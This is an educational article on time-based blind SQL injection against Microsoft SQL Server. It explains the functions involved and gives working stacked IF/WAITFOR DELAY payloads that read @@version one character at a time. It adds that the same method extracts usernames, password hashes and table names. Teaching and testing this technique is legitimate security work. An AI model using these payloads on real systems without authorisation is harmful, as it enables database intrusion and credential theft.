MSSQL Blind

Context

This article aims to teach the exploitation of MSSQL Blind SQL Injection for data extraction. It assumes that the reader has an intermediate understanding of SQL query structures and the HTTP request/response cycle.

Theory

Blind SQL Injection in MSSQL

Blind SQL Injection is a technique for inferring data from a database without ever seeing its output. It applies when a web application places attacker-controlled input into a SQL query but returns neither the query's results nor the database's error messages. The attacker instead encodes one true/false question per request and reads the answer from an observable side channel: a conditional change in the page content, or a time delay that the injected query triggers only when the condition holds.

Function Usage in Blind SQL Injection

Blind SQL Injection relies heavily on specific MSSQL functions to infer data:

  • substring(): Extracts part of a string; SUBSTRING(expr, start, length) uses a 1-based start. Taking one character at a time is how a value such as @@version is read out position by position.

  • ascii(): Returns the ASCII code of the leftmost character of its argument. Comparing that code against a guess (or against a threshold, to binary-search the value) turns each character into a yes/no question.

  • charindex(): Returns the 1-based position of a substring within a string, or 0 when it is absent, which allows inference about position or presence without reading every character.

  • left(): Returns the leftmost n characters of a string.

  • right(): Returns the rightmost n characters; together with left() it narrows extraction to a specific part of a value.

Data Extraction Mechanisms

Blind SQL Injection extracts data through conditional logic: every request evaluates one condition that is either true or false. The answer is not read from the database but from a side channel the application unintentionally exposes, either a difference in the response content (boolean-based) or a difference in response time (time-based). For example, an injected payload can make the server pause for several seconds only when the condition is true; the presence or absence of that delay reveals one bit of information per request.

Practice

Blind SQL Injection Data Extraction

Execute these steps to extract data via Blind SQL Injection in MSSQL. Each payload is a stacked statement: in the real request it follows the terminator of the original query (';') and is closed with a comment ('--') so that the remainder of the application's query is discarded. WAITFOR DELAY is a statement, not an expression, so it must be driven by IF; it cannot be placed inside a CASE expression.

  1. Determine if the first character of @@version is 'M' (ASCII 77):

    IF (ASCII(SUBSTRING(@@version,1,1))=77) WAITFOR DELAY '0:0:5'
    
    • If the server delays its response by about 5 seconds, the character is confirmed as 'M'; an immediate response means the guess was wrong and the next candidate value is tried.
  2. Determine if the second character of @@version is 'i' (ASCII 105):

    IF (ASCII(SUBSTRING(@@version,2,1))=105) WAITFOR DELAY '0:0:5'
    
    • A delayed response confirms the character as 'i'.
  3. Determine if the third character of @@version is 'c' (ASCII 99):

    IF (ASCII(SUBSTRING(@@version,3,1))=99) WAITFOR DELAY '0:0:5'
    
    • A 5-second delay means the character is 'c'.

Repeating this for every position recovers the full value, and the same pattern works for any expression that fits in the subquery (a username, a password hash, table names from information_schema). An equality test can cost up to 128 requests per character for ASCII data; comparing the code against a threshold (>) and binary-searching it needs at most seven. The delay should be chosen well above the target's normal response time, or network jitter will be mistaken for a true condition.

Tools

  • sqlmap
